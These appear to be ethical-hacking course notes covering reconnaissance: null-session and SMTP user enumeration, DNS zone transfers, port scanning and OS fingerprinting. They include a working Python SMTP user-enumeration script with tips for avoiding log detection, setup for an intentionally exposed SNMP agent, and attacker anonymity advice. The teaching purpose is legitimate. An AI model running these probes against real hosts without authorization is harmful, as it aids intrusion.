  • DumpSec is a Windows tool for enumerating users, groups, shares, permissions (DACLs), and audit settings (SACLs)
  • Once you make a null session connection with: net use \\<computer name or IP>\ipc$ “” /user:”” ; you can then run: net view \\<computer name or IP> to list out the shares on the computer
  • nbtstat is a Windows command-line tool for diagnosing problems with NBT (NetBIOS over TCP).  You can use the -a <name> or -A <IP address> flags to pull the NetBIOS name table of a remote host.
  • Nbtscan is much like nbtstat, but can be used against a range of IP addresses, instead of only one at a time.  Available in Windows and Linux flavors.
  • And (big shock!) nmap has several SMB enumeration scripts to run via the NSE (Nmap Scripting Engine), including smb-enum-shares, smb-enum-groups, smb-enum-processes, and many more.

  • TESTING NOTE: How to set up a vulnerable SNMP agent on Debian/Ubuntu/Linux Mint:
    -sudo apt-get install snmpd
    -Edit /etc/snmp/snmpd.conf: in the AGENT BEHAVIOUR section, comment out the agentAddress line that binds the agent to localhost only, and uncomment “agentAddress udp:161,udp6:[::1]:161” so it listens on all interfaces
    -The default “rocommunity public” line restricts the public community to the systemonly view; drop the “-V systemonly” part if you want snmpwalk to return the whole tree
    -sudo /etc/init.d/snmpd restart (or sudo service snmpd restart), then confirm with snmpwalk -v2c -c public <IP> from another box

  • EXPN will spit out all the addresses in a mailing list or alias.  It’s worth a shot to try “EXPN all”, “EXPN staff” and other plausible list names.
  • VRFY will verify that a bare username (no domain part on the end) is a valid mailbox on the system
  • And if all those fail (most modern MTAs disable VRFY/EXPN or answer 252 “cannot verify” to everything), start an actual message in the raw SMTP session and see which recipients it accepts:
    HELO test.example
    MAIL FROM:<junk@junk.junk>
    RCPT TO:<username>
    RCPT is specifying who the recipient of the email is going to be, and you can add as many as you like.  A valid user gets a 250 OK; an invalid one gets a 550 “user unknown.”  Caveat: a catch-all server says 250 to every recipient, so test a nonsense username first to make sure the answers mean anything.  Send RSET (or just QUIT) afterwards so you don’t leave a half-written message behind.
  • smtp-user-enum is a Perl script (included with Kali) that can enumerate users using EXPN, VRFY, and RCPT methods, plus taking individual or lists of usernames/email addresses to try out and can enumerate multiple SMTP servers at once.
  • swaks stands for Swiss Army Knife SMTP and is an all-purpose SMTP testing and debugging tool, but is also useful for doing SMTP enumeration work.
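
To show both sides of that conversation, here’s an added Python example (not code from the slides or from smtp-user-enum).  FakeSMTPServer is a constructed stand-in that speaks just enough SMTP for the demo (a user list, VRFY that can be switched off to answer 252, and an optional catch-all mode); SMTPConn shows the same client code driving a real socket.  The client tries VRFY first, falls back to RCPT TO when the server won’t verify, and probes a canary recipient so a catch-all server doesn’t fool it into reporting every user as valid.

```python
"""SMTP user enumeration with VRFY, falling back to RCPT TO, against an in-memory server.

Added example for these notes, not code from the original page. FakeSMTPServer is a
constructed stand-in with a made-up user list; SMTPConn is the real-socket transport."""
import socket

CANARY = "zq9x.nonexistent.1138"   # a mailbox no real server should have


class SMTPConn:
    """Real transport: a TCP socket plus a buffered reader. Not used by the demo run."""
    def __init__(self, host: str, port: int = 25, timeout: float = 5.0):
        self.sock = socket.create_connection((host, port), timeout=timeout)
        self.reader = self.sock.makefile("rb")

    def sendall(self, data: bytes) -> None:
        self.sock.sendall(data)

    def readline(self) -> bytes:
        return self.reader.readline()


def read_reply(conn):
    """Read one reply; '250-...' lines continue a multi-line reply, '250 ...' ends it."""
    lines = []
    while True:
        line = conn.readline().decode("latin-1").rstrip("\r\n")
        if not line:
            raise ConnectionError("connection closed mid-reply")
        lines.append(line)
        if len(line) < 4 or line[3] != "-":
            return int(line[:3]), lines


def command(conn, text: str):
    conn.sendall((text + "\r\n").encode("latin-1"))
    return read_reply(conn)


def enumerate_users(conn, usernames, sender: str = "junk@junk.junk") -> dict:
    """Return {user: True (exists) / False (unknown) / None (server won't say)}.
    VRFY first; on 252/502 switch to RCPT TO, after checking with a canary recipient
    that the server isn't a catch-all that says 250 to everything."""
    results, use_rcpt, catch_all = {}, False, False
    read_reply(conn)                       # 220 banner
    command(conn, "EHLO enum.example")
    for user in usernames:
        if not use_rcpt:
            code, _ = command(conn, f"VRFY {user}")
            if code in (250, 251):
                results[user] = True
                continue
            if code in (550, 551, 553):
                results[user] = False
                continue
            use_rcpt = True                # 252 "cannot VRFY" or 502 "not implemented"
            command(conn, f"MAIL FROM:<{sender}>")
            code, _ = command(conn, f"RCPT TO:<{CANARY}>")
            catch_all = code in (250, 251)
        if catch_all:
            results[user] = None
            continue
        code, _ = command(conn, f"RCPT TO:<{user}>")
        results[user] = True if code in (250, 251) else False if code in (550, 551, 553) else None
    if use_rcpt:
        command(conn, "RSET")              # don't leave a half-written message behind
    command(conn, "QUIT")
    return results


class FakeSMTPServer:
    """Constructed in-memory server with the same sendall/readline interface as SMTPConn."""
    def __init__(self, users, vrfy: bool = True, catch_all: bool = False):
        self.users, self.vrfy, self.catch_all = set(users), vrfy, catch_all
        self.queue = [b"220 mail.example.test ESMTP (constructed)\r\n"]

    def readline(self) -> bytes:
        return self.queue.pop(0) if self.queue else b""

    def _reply(self, *lines):
        self.queue.extend((line + "\r\n").encode("latin-1") for line in lines)

    def sendall(self, data: bytes) -> None:
        verb, _, arg = data.decode("latin-1").strip().partition(" ")
        verb = verb.upper()
        if verb in ("HELO", "EHLO"):
            self._reply("250-mail.example.test", "250-SIZE 10240000",
                        "250 VRFY" if self.vrfy else "250 8BITMIME")
        elif verb == "VRFY":
            if not self.vrfy:
                self._reply("252 2.5.2 Cannot VRFY user, but will accept message")
            else:
                self._reply(f"250 {arg}" if arg in self.users else "550 5.1.1 User unknown")
        elif verb == "MAIL":
            self._reply("250 2.1.0 Ok")
        elif verb == "RCPT":
            addr = arg.partition(":")[2].strip().strip("<>")
            accepted = self.catch_all or addr in self.users
            self._reply("250 2.1.5 Ok" if accepted else f"550 5.1.1 <{addr}>: User unknown")
        elif verb == "RSET":
            self._reply("250 2.0.0 Ok")
        elif verb == "QUIT":
            self._reply("221 2.0.0 Bye")
        else:
            self._reply("502 5.5.2 Error: command not recognized")


if __name__ == "__main__":
    server = FakeSMTPServer(users={"root", "alice", "www-data"}, vrfy=False)
    print(enumerate_users(server, ["root", "alice", "bob", "www-data"]))
```

Against a real host, swap the fake for SMTPConn("mail.target", 25) and go slowly: a burst of RCPT TO probes from one source is exactly what mail admins grep their logs for.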

  • LDAP (Lightweight Directory Access Protocol) is probably best known as the protocol behind Windows Active Directory, but is also used by Apple for its Open Directory system integrated into Mac OS X and many Linux/Unix systems use implementations of LDAP, such as OpenLDAP and Oracle Internet Directory.
  • NTP (Network Time Protocol) can be abused to reveal peers and clients…in addition to revealing time/time zone, in case you weren’t sure where the target is located in the world.  Nmap scripts like ntp-info and ntp-monlist are probably the easiest way to query it.  monlist is the same query that was abused for NTP amplification DDoS attacks, so current ntpd versions disable it by default; if it answers, that alone tells you the daemon is old.  Every once in a while, NTP has a bad vulnerability, so pay attention to the ntpd version info it leaks as well.

  • showmount will enumerate any NFS (Network File System) exports a host offers: showmount -e <IP address or hostname>.  An export listed for * (everyone) can often be mounted with no authentication at all.
  • If you find a host that’s running the finger service on TCP port 79, you can query it for details on user accounts.  In addition to trying to tease normal user accounts out of it, you can look for service accounts (like www-data, ftp, and others) that will indirectly confirm the existence of certain software running.  For example, if you see the “www-data” user, then you know the target system has a web server like Apache installed.  One command to try is finger ‘a b c d e f g h’@<hostname>, which if it works will barf all the users on the system.
  • If you see TCP or UDP port 111 open (nmap will identify it as “portmapper”), you can use the rpcinfo command to see what services and apps on a server map to what ports.  This is a great way to figure out what software is running on the system for looking up exploits later.
  • Dirb is command-line based and Dirbuster is a Java-based GUI, but both do the same thing: take a list of possible names and try to brute-force all the directories under a given hostname, looking for signs of vulnerable software, hidden pages, admin login portals, and other juicy info.  Both come with wordlists of common web server directories in their respective /usr/share/ directories.
  • Also, if you’ve fingerprinted certain services and ESPECIALLY certain devices and appliances…go look up their default accounts and passwords online!  Lazy admins often neglect to change them.

CNS320 Lesson 4 – Scanning

Lesson 4 – Scanning

Screen Shot 2016-01-18 at 10.29.19 PM.png

Screen Shot 2016-01-18 at 10.29.20 PM.png

  • OPSEC is a term borrowed from the US military.  In a military context, it means not talking about (or chatting on IRC about, or posting on Facebook about…) military operations, troop movements, new weapons systems, etc. with people who don’t have a need-to-know, because of the risk of this information falling into enemy spies’ hands.
  • In a hacker context, it means not letting information about your identity, geographical location, hacking tools and methods, etc. slip to law enforcement, intelligence agencies, competing hacker groups, or other adversaries.  LulzSec is a great case study in terrible OPSEC resulting in a hacking group being taken down hard.
  • A security researcher known as The Grugq is the authority on hacker OPSEC.  I highly recommend his work on the subject, which can be found here:
  • SPOILER ALERT: The Grugq’s OPSEC advice can be summed up in one acronym – STFU    😉

Screen Shot 2016-01-18 at 10.29.21 PM.png

  • Tor (The Onion Router) is one of the longest-running anonymity network projects on the Internet.  It uses a network of participating nodes to randomly route and anonymize traffic.  Tor also can be used to host so-called “hidden services,” sites that aren’t accessible via the normal Internet and only reachable over Tor (the so-called “Dark Net”).  Perhaps the best known such site was the Silk Road drug marketplace.
  • The easiest way to use it is with the official Tor Browser Bundle, which uses a modified copy of Firefox, but this only protects your web browsing.  To protect more of your traffic, you would need to use either:
  • 1.) A Tor-centric custom Linux distribution, such as TAILS (famously used by Edward Snowden), Liberté, Whonix, and others
  • 2.) A personal router with built-in Tor capabilities, such as the PORTAL router project
  • The Invisible Internet Project (I2P) is a newer project that uses a more decentralized, peer-to-peer anonymization approach, known as “garlic routing.”  One additional advantage is that I2P can route both TCP and UDP traffic, whereas Tor can only route TCP.  While, on the surface, it has the potential to be even more secure and hardened against decloaking attacks than Tor, it is a newer project and hasn’t been thoroughly vetted yet.  The third iteration of the Silk Road drug market moved to I2P.

Screen Shot 2016-01-18 at 10.29.22 PM.png

  • Virtual Private Networks (VPNs) are good enough for hiding your movie pirating or evading region detection, but not good enough for evading law enforcement (even the providers who claim they never keep logs of your connections), as several Anonymous and LulzSec members have found out.  They can be a useful obfuscation means for an attacker, if used in conjunction with an anonymizer like Tor or I2P.
  • Proxies and proxifiers are also useful for covering an attacker’s tracks, but again aren’t necessarily built for anonymity, so a wise attacker will use them in conjunction with Tor or another anonymizer.
  • For legitimate pen-testers, proxies’ and VPNs’ best use is for evading IDS’s, firewalls, or region restrictions.

Screen Shot 2016-01-18 at 10.29.24 PM.png

Screen Shot 2016-01-18 at 10.29.25 PM.png

Screen Shot 2016-01-18 at 10.29.26 PM.png

Screen Shot 2016-01-18 at 10.29.27 PM.png

Screen Shot 2016-01-18 at 10.29.29 PM.png

  • Call me crazy, but if you’re trying to do a zone transfer off my DNS server, that puts you firmly in the “probably a f**king hacker” category and my firewalls and IDS should act accordingly

Screen Shot 2016-01-18 at 10.29.30 PM.png

  • Google has a plethora of different operators for finding admin login pages, specific sorts of web technology (like phpBB forums or mySQL instances) you might have exploits for, and other sorts of interesting pages.
  • “Robots.txt” is a list of all the pages within a domain that the site owner DOESN’T want search engines to index.  Search engines are nice enough to abide by this convention…but it also gives a juicy list of places for hackers to look for stuff like admin portals, diagnostic pages, etc.
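Because robots.txt is a public map of exactly the places you asked search engines not to look, it is worth auditing your own. The following is an added example for these notes, not code from any tool the course uses; the sample robots.txt and the list of "sensitive-looking" path fragments are assumptions constructed for the example. It parses the file with the usual grouping rule (consecutive User-agent lines share the rules that follow) and reports the Disallow entries that look like they hide something an attacker would want rather than something merely uninteresting to index.

```python
# Constructed sample robots.txt (assumed for this example, not from any real site)
SAMPLE_ROBOTS = """\
# keep crawlers out of the back office and the staging copy
User-agent: *
Disallow: /admin/
Disallow: /phpmyadmin/
Disallow: /backup/db-dump-2016.sql
Disallow: /cgi-bin/
Disallow: /images/
Allow: /images/public/
Sitemap: https://www.example.com/sitemap.xml

User-agent: Googlebot
User-agent: Bingbot
Disallow: /staging/
Disallow:
"""

# Path fragments that usually mean "something to protect" rather than "something not to
# index". Assumed list for the example; tune it to your own site's naming.
SENSITIVE_HINTS = ("admin", "login", "phpmyadmin", "backup", "dump", ".sql", "cgi-bin",
                   "staging", "config", "debug", "private", "upload")

def parse_robots(text):
    """Parse robots.txt into a list of (user_agent, directive, value) triples.

    One or more consecutive User-agent lines open a group, and the Allow/Disallow lines
    that follow apply to every agent in that group. Sitemap lines are global and are
    recorded under user_agent '*'."""
    rules = []
    agents = []
    in_agent_run = False
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments and blank lines
        if not line or ":" not in line:
            continue
        field, _, value = line.partition(":")
        field, value = field.strip().lower(), value.strip()
        if field == "user-agent":
            if not in_agent_run:                  # a new group starts here
                agents = []
            agents.append(value)
            in_agent_run = True
        elif field in ("allow", "disallow"):
            in_agent_run = False
            if value:                             # a bare "Disallow:" means allow everything
                for agent in agents or ["*"]:
                    rules.append((agent, field, value))
        elif field == "sitemap":
            in_agent_run = False
            rules.append(("*", field, value))
    return rules

def sensitive_disallows(text, hints=SENSITIVE_HINTS):
    """Return the sorted set of Disallow paths that look like they hide something sensitive."""
    found = set()
    for _agent, directive, path in parse_robots(text):
        if directive == "disallow" and any(h in path.lower() for h in hints):
            found.add(path)
    return sorted(found)

if __name__ == "__main__":
    for path in sensitive_disallows(SAMPLE_ROBOTS):
        print(f"robots.txt advertises {path}: make sure it is behind authentication, not just unlisted")
```

The check is the point: anything that shows up in the report should be protected by authentication or network restrictions, because listing it in robots.txt only keeps out the polite crawlers.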

Screen Shot 2016-01-18 at 10.29.31 PM.png

  • For whatever reason, most Unix-like systems have three competing tools for DNS lookups that mostly do the same thing.  All three are developed by the same organization, the Internet Systems Consortium (ISC), which also makes BIND, the de facto standard for DNS server software.  Nslookup is the oldest; dig and host are newer.  Dig is more complex, while host is a very simple tool.  ISC tried to kill nslookup in favor of dig, but gave up.
  • Use whatever the hell you want…or more likely, you’ll just be using some other security tool or script that will use one of them for you.

Screen Shot 2016-01-18 at 10.29.33 PM.png

  • Forward lookup = getting the IP address for a given domain name
  • Reverse lookup = getting the domain name for a given IP address (keep in mind that this doesn’t always work: the name server you’re querying has to have PTR records for the IP addresses in question)

Screen Shot 2016-01-18 at 10.29.34 PM.png

  • Zone transfer is replicating a DNS server’s entire database of records.
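What a zone transfer actually hands over, and why the reverse lookups above depend on PTR records, is easier to see on a concrete zone. The following is an added example for these notes, not code from BIND or any of the DNS tools the course uses; the zone file is a constructed sample in BIND master-file syntax with assumed names and addresses. It parses the zone (comments, $ORIGIN, multi-line SOA, inherited owner names), builds the in-addr.arpa / ip6.arpa name a PTR lookup would ask for, and lists the names whose A records point into RFC 1918 space, which is the part of a leaked zone that maps your internal layout for an attacker.

```python
import ipaddress

# Constructed sample zone in BIND master-file syntax, roughly what an AXFR would return.
# Names and addresses are assumed for this example, not from any real zone.
SAMPLE_ZONE = """\
$ORIGIN example.com.
$TTL 3600
@        IN  SOA  ns1.example.com. hostmaster.example.com. (
                  2016012301 ; serial
                  7200       ; refresh
                  900        ; retry
                  1209600    ; expire
                  3600 )     ; minimum
@        IN  NS   ns1.example.com.
@        IN  NS   ns2.example.com.
@        IN  MX   10 mail.example.com.
ns1      IN  A    192.0.2.53
ns2      IN  A    192.0.2.54
www      IN  A    192.0.2.80
mail     IN  A    192.0.2.25
vpn      IN  A    198.51.100.1
dev-db   IN  A    10.0.5.12
intranet 300 IN A 10.0.5.20
ftp      IN  CNAME www
"""

RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

def qualify(name, origin):
    """Turn a relative owner name into a fully qualified one."""
    if name == "@":
        return origin
    if name.endswith("."):
        return name
    return name + "." if origin == "." else f"{name}.{origin}"

def parse_zone(text):
    """Return a list of (fqdn, type, rdata) from a zone in master-file format.
    Handles ; comments, $ORIGIN/$TTL, parenthesised multi-line records and owner inheritance
    (a record whose line starts with whitespace reuses the previous owner name)."""
    origin, records, prev_owner = ".", [], None
    buf, depth, inherits = "", 0, False
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].rstrip()            # strip trailing comments
        if depth == 0:
            if not line.strip():
                continue
            buf, inherits = line, line[:1].isspace()
        else:
            buf += " " + line.strip()
        depth += line.count("(") - line.count(")")
        if depth > 0:
            continue                                     # still inside a ( ... ) record
        fields = buf.replace("(", " ").replace(")", " ").split()
        if not fields:
            continue
        if fields[0] == "$ORIGIN":
            origin = fields[1]
            continue
        if fields[0] == "$TTL":
            continue
        owner = prev_owner if inherits else fields.pop(0)
        if fields and fields[0].isdigit():               # optional TTL
            fields.pop(0)
        if fields and fields[0].upper() in ("IN", "CH", "HS"):   # optional class
            fields.pop(0)
        rtype, rdata = fields[0].upper(), " ".join(fields[1:])
        records.append((qualify(owner, origin), rtype, rdata))
        prev_owner = owner
    return records

def reverse_name(ip):
    """Build the name a reverse (PTR) lookup asks for: octets reversed under in-addr.arpa for
    IPv4, nibbles reversed under ip6.arpa for IPv6 (ipaddress.reverse_pointer does the same)."""
    addr = ipaddress.ip_address(ip)
    if addr.version == 4:
        return ".".join(reversed(str(addr).split("."))) + ".in-addr.arpa."
    nibbles = addr.exploded.replace(":", "")             # 32 hex digits
    return ".".join(reversed(nibbles)) + ".ip6.arpa."

def internal_hosts(records):
    """Names whose A record points into RFC 1918 space: these have no business in a public
    zone, and they are the first thing an attacker pulls out of a successful AXFR."""
    leaked = []
    for fqdn, rtype, rdata in records:
        if rtype == "A" and any(ipaddress.ip_address(rdata) in net for net in RFC1918):
            leaked.append(fqdn)
    return sorted(leaked)

if __name__ == "__main__":
    recs = parse_zone(SAMPLE_ZONE)
    print(f"{len(recs)} records; internal names exposed: {internal_hosts(recs)}")
    for fqdn, rtype, rdata in recs:
        if rtype == "A":
            print(f"{fqdn:22} {rdata:15} PTR would be asked at {reverse_name(rdata)}")
```

The reverse name shows why reverse lookups so often fail: the PTR record lives in a completely different zone (the in-addr.arpa tree, normally delegated to whoever owns the address block), so the forward zone's operator may never have populated it. The RFC 1918 check is the defensive half: run it against your own zone, and move anything it reports into an internal-only view before someone else reads it out of an unrestricted transfer.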

Screen Shot 2016-01-18 at 10.29.35 PM.png

  • One person’s useful tool is another’s malicious hacker cyberweapon.  Some people even act like firing up Wireshark is evil blackhat sort of shit.
  • From here on out, the CEH prep material is extremely tool-centric.  If you read the books for this course, you’ll see an especially large volume of tool vomit.
  • Look at them, be vaguely familiar with many of them…but really, you only have to know a small number of tools extremely well in order to pass the CEH exam.  And we will use those tools extensively in our labs and practical exercises.

Screen Shot 2016-01-18 at 10.29.36 PM.png

  • Many of these tools work the same way; they will attempt to brute-force all the different subdomains of a given domain name (usually from a wordlist), brute-force forward or reverse lookups of names and ranges, attempt zone transfers, etc.

Screen Shot 2016-01-18 at 10.29.38 PM.png

Screen Shot 2016-01-18 at 10.29.39 PM.png

Screen Shot 2016-01-18 at 10.29.40 PM.png

  • As you’ll see in the upcoming slides, nmap really is the total package.  It’s one of the oldest and most versatile security tools out there.

Screen Shot 2016-01-18 at 10.29.44 PM.png

Screen Shot 2016-01-18 at 10.29.47 PM.png

Screen Shot 2016-01-18 at 10.29.48 PM.png

  • Netdiscover is super quick and uses ARP, rather than ICMP, in order to identify live hosts on a subnet
  • Hping (more properly hping3…but since the CEH exam never gets updated, you may still see it referred to as hping2) is a very versatile and customizable tool for crafting TCP and UDP packets.  There’s a lot of overlap between it and nmap, but hping is good for more targeted probing of specific systems and ports.
  • Alive6 is a good tool when looking for IPv6 hosts
  • Fping is an older than dirt ping sweeper, as is netenum
  • Angry IP Scanner is a Windows tool

Screen Shot 2016-01-18 at 10.29.52 PM.png

Screen Shot 2016-01-18 at 10.29.53 PM.png

Screen Shot 2016-01-18 at 10.29.54 PM.png

Screen Shot 2016-01-18 at 10.29.55 PM.png

Screen Shot 2016-01-18 at 10.29.56 PM.png

Screen Shot 2016-01-18 at 10.29.58 PM.png

Screen Shot 2016-01-18 at 10.29.59 PM.png

  • Firewalk is specifically a tool for trying to figure out what ports are actually closed on a host and which are just being blocked by a firewall.  It uses some traceroute-fu to accomplish that.  We’ll discuss it more in the Evasion lesson later in the course.
  • Unicornscan is a more advanced host and port scanner, built around being fast and using its own custom-engineered TCP/IP stack.  Some like it…I just stick to nmap, personally.
  • Dmitry is a quick tool that does port scans…but can also do a little DNS bruting, whois lookups, and can check Netcraft for info on a server
  • SuperScan is a Windows TCP port scanner, freeware from McAfee

Screen Shot 2016-01-18 at 10.30.01 PM.png

Screen Shot 2016-01-18 at 10.30.03 PM.png

  • The idea behind fingerprinting is to look at the packets you receive and look for signs that point to a particular operating system’s TCP/IP stack.
  • TCP/IP is regulated by the RFC system…but different OS’s take different approaches and different liberties with implementing them, such as how they respond to illegal flags, TTL values, window sizes, how they generate sequence numbers, etc.

Screen Shot 2016-01-18 at 10.30.04 PM.png

  • Default TTL (Time To Live) and window sizes vary between Windows and different Unix-like systems.
  • Most systems have the DF (“Don’t Fragment”) bit set, but if it ISN’T set, it can be a dead giveaway for certain obscure Unix flavors (such as OpenBSD and SCO Unix)
  • TOS is of limited usefulness in fingerprinting OS’s.
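To make the TTL / window-size / DF reasoning above concrete, here is an added example written for these notes; it is not code from p0f, nmap or any other tool the course mentions. The signature table is a small illustrative subset, assumed for the example (real signature databases are far larger and stacks change their defaults between releases), and the packet observations are constructed. It rounds an observed TTL up to the nearest common initial value to recover both the OS family and the hop count, then matches the window size and DF bit against the table, falling back to the TTL family alone when nothing matches.

```python
# Illustrative signature table: (initial TTL, TCP window size on the SYN, DF bit set, label).
# Assumed for this example; a tiny subset of the kind of entries p0f and nmap carry.
SIGNATURES = [
    (64,  5840,  True,  "Linux (2.6-era default)"),
    (64,  14600, True,  "Linux (3.x-era default)"),
    (64,  29200, True,  "Linux (4.x-era default)"),
    (64,  65535, True,  "FreeBSD / macOS"),
    (64,  16384, False, "OpenBSD (no DF bit)"),
    (128, 8192,  True,  "Windows 7 / Server 2008 R2"),
    (128, 65535, True,  "Windows XP / Server 2003"),
    (255, 4128,  False, "Cisco IOS"),
]

# The coarsest but most reliable signal: nearly every stack starts TTL at 64, 128 or 255.
TTL_FAMILIES = {64: "Linux/BSD/macOS family", 128: "Windows family",
                255: "Solaris/Cisco/network gear"}

def guess_initial_ttl(observed_ttl):
    """Round an observed TTL up to the nearest common initial value."""
    if not 0 < observed_ttl <= 255:
        raise ValueError(f"TTL out of range: {observed_ttl}")
    return next(t for t in (64, 128, 255) if observed_ttl <= t)

def fingerprint(observed_ttl, window, df):
    """Guess the sender's OS family from one packet's TTL, window size and DF bit."""
    initial = guess_initial_ttl(observed_ttl)
    hops = initial - observed_ttl            # each router on the path decrements TTL once
    guesses = [label for t, w, d, label in SIGNATURES
               if t == initial and w == window and d == df]
    if not guesses:
        guesses = [TTL_FAMILIES[initial] + " (TTL only)"]
    return {"initial_ttl": initial, "hops": hops, "guesses": guesses}

# Constructed observations, as a passive sniffer would record them: (src, ttl, window, df).
SAMPLE_PACKETS = [
    ("10.0.5.12", 57, 29200, True),
    ("10.0.5.20", 116, 8192, True),
    ("10.0.5.1", 253, 4128, False),
    ("10.0.5.30", 60, 12345, True),    # unknown window: only the TTL family is usable
]

def inventory(packets):
    """Fingerprint every source; handy for spotting hosts that don't match what the asset
    list claims they are (a 'Windows' address answering with a Linux-looking SYN, say)."""
    return {src: fingerprint(ttl, win, df) for src, ttl, win, df in packets}

if __name__ == "__main__":
    for src, result in inventory(SAMPLE_PACKETS).items():
        print(f"{src:12} initial TTL {result['initial_ttl']:3} ({result['hops']} hops away): "
              + " / ".join(result["guesses"]))
```

Two things the output makes obvious: the TTL alone leaks hop count as well as OS family, and a window-size match is only as good as the table, so the "(TTL only)" fallback is the honest answer more often than you'd like. Used defensively, the same logic over a packet capture gives you a quick second opinion on your own asset inventory.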

Screen Shot 2016-01-18 at 10.30.06 PM.png

Screen Shot 2016-01-18 at 10.30.07 PM.png

Screen Shot 2016-01-18 at 10.30.08 PM.png

  • p0f requires that you be MiTMing traffic, as it’s a passive scanner.
  • Amap is an older scanning tool from the hacker collective THC.  Probably not as good as nmap, but maybe worth trying
  • Xprobe2 is an active fingerprinting tool

Screen Shot 2016-01-18 at 10.30.11 PM.png

  • Nessus used to be an open project, until it was bought up by Tenable Network Security.  Tenable closed-sourced it and pissed off lots of folks in the open source and security community.
  • In retaliation, the last open version of Nessus (version 2) was forked to form the OpenVAS (Open Vulnerability Assessment System) project.
  • Nessus/OpenVAS scans are like artillery going off on a network…very loud and you will get noticed.  Not good for a sneaky pentest, but great if all you need is a vulnerability assessment.

Screen Shot 2016-01-18 at 10.30.12 PM.png

Screen Shot 2016-01-18 at 10.30.14 PM.png

  • Most of these scanners are commercial, so we won’t be playing with them.  Don’t worry, you won’t need to know any of them for the test.

Screen Shot 2016-01-18 at 10.30.17 PM.png


CNS320 Lesson 3 – Footprinting

Lesson 3 – Footprinting

Screen Shot 2016-01-18 at 9.09.03 PM.png

  • Footprinting is essential for scoping your target, as it will give you an idea of what sort of systems you’re attacking, what public IP ranges your target owns (attack surface), what domains
  • Footprinting is focused on *passive* reconnaissance.  You will learn as much as you can indirectly about the target first.  Then, you will have very controlled direct interaction with the target in the semi-passive phase.  Semi-passive footprinting should be largely indistinguishable from normal traffic (eg, do some DNS queries or look at their webpage, but don’t do brute-force reverse DNS lookups or hardcore crawling of every page, etc.)

Screen Shot 2016-01-18 at 9.09.08 PM.png

  • The idea is not to touch the target organization until you’ve gathered enough info indirectly

Screen Shot 2016-01-18 at 9.09.10 PM.png

  • CDN = content delivery network

Screen Shot 2016-01-18 at 9.09.11 PM.png

Screen Shot 2016-01-18 at 9.09.12 PM.png

Screen Shot 2016-01-18 at 9.09.13 PM.png

Screen Shot 2016-01-18 at 9.09.14 PM.png

Screen Shot 2016-01-18 at 9.09.15 PM.png

Screen Shot 2016-01-18 at 9.09.16 PM.png

  • For example, if you see the target company is looking to hire Oracle DBA’s on LinkedIn or Dice, then you can guess what sort of databases they’re running 🙂

Screen Shot 2016-01-18 at 9.09.17 PM.png

Screen Shot 2016-01-18 at 9.09.19 PM.png

Screen Shot 2016-01-18 at 9.09.20 PM.png

Screen Shot 2016-01-18 at 9.09.21 PM.png

Screen Shot 2016-01-18 at 9.09.23 PM.png

Screen Shot 2016-01-18 at 9.09.24 PM.png

Screen Shot 2016-01-18 at 9.09.25 PM.png

Screen Shot 2016-01-18 at 9.09.26 PM.png

  • ARIN = American Registry for Internet Numbers
  • RIPE NCC = Réseaux IP Européens Network Coordination Centre
  • APNIC = Asia Pacific Network Information Centre
  • LACNIC = Latin American and Caribbean Network Information Center
  • AfriNIC = African Network Information Center

Screen Shot 2016-01-18 at 9.09.27 PM.png

Screen Shot 2016-01-18 at 9.09.29 PM.png

Screen Shot 2016-01-18 at 9.09.30 PM.png

Screen Shot 2016-01-18 at 9.09.31 PM.png

Screen Shot 2016-01-18 at 9.09.32 PM.png

Screen Shot 2016-01-18 at 9.09.34 PM.png

Screen Shot 2016-01-18 at 9.09.35 PM.png

Screen Shot 2016-01-18 at 9.09.36 PM.png

CNS320 Lesson 2 – Linux Fundamentals

Lesson 2 – Linux Fundamentals

I can’t emphasize enough how important it is to feel comfortable in Linux/Unix if you’re going to get serious about penetration testing.  My biggest complaint while I was teaching is that there was no Linux pre-req for my course.  I did my best to spin up the newbies or refresh those who hadn’t touched Linux in a while. By the end of the course, most of my students were competent Linux command line users. I even got a student to change her opinion from “Linux sucks!” to “Linux is okay.” 😄

Screen Shot 2016-01-18 at 8.01.37 PM.png

  • Ken Thompson (left) and Dennis Ritchie (right) were computer scientists working at AT&T Bell Labs in the 1960’s and 1970’s.  They were originally working on a joint project with MIT, GE, and others called “Multics”.  Bell Labs ended up dropping out of the project, but Ken and Dennis took what they learned and used it to develop a hobby operating system (OS) that they jokingly called “UNIX.”
  • Ken’s motivation was to write an OS so that a computer game he was working on, called Space Travel, would work better on the unused PDP-7 computer they had in the lab.
  • More details on Unix history can be found here, in an excerpt from the book The Art of Unix Programming:

Screen Shot 2016-01-18 at 8.01.48 PM.png

  • Ken Thompson (seated) and Dennis Ritchie, hacking away on a DEC PDP-11.  Despite being the size of a set of bookcases, the PDP-11 series were considered “minicomputers” back then…because they were smaller than the IBM mainframes that took up entire rooms.
  • UNIX’s big claim to fame would be that large portions of it were eventually rewritten in the high-level C programming language (which was developed by Dennis Ritchie and others at Bell Labs), instead of the PDP-7 or PDP-11’s processor-specific assembly language.  This allowed UNIX to be easily rewritten for other platforms and contributed to its (and the C language’s) spread.
  • Also, at the time, AT&T still had a monopoly on telephone service and was barred from entering the computer market by the US Department of Justice.  As part of a settlement with the US DoJ, they had to freely and cheaply license any computer software they developed at Bell Labs.
  • Being cheaply distributed, in a high-level language, and with the source code included, made UNIX extremely popular in college computer science departments.
  • One of the earliest customers was the University of California, Berkeley.  In 1977, they released the first Berkeley Software Distribution (BSD), a collection of customizations and new software for UNIX.  Eventually, the BSD project would rewrite the entire UNIX kernel and become its own operating system.  The little devil cartoon is Beastie, the BSD mascot.

Screen Shot 2016-01-18 at 8.01.50 PM.png

  • In the 1980’s, Richard M. Stallman (pictured) quit his job as an MIT researcher to found the GNU Project.  The idea was to make a totally free, open-source operating system that anyone could use and contribute to, free of any corporate ownership.
  • The project succeeded in developing tons of very useful tools that many people would use with their existing UNIX operating system, such as the Bourne Again (bash) shell, the GNU Compiler Collection (gcc) and the GNU Debugger (gdb).
  • However, they never managed to develop a fully-functional OS kernel to replace the proprietary AT&T-developed one. There are people still working on it and it’s called GNU Hurd. You can even download a prototype and try it out, but it’s been stuck in development hell for decades.  Even if it is ever finished into a stable product, it would still just be a curiosity.  Someone else already solved the kernel problem…

Screen Shot 2016-01-18 at 8.01.51 PM.png

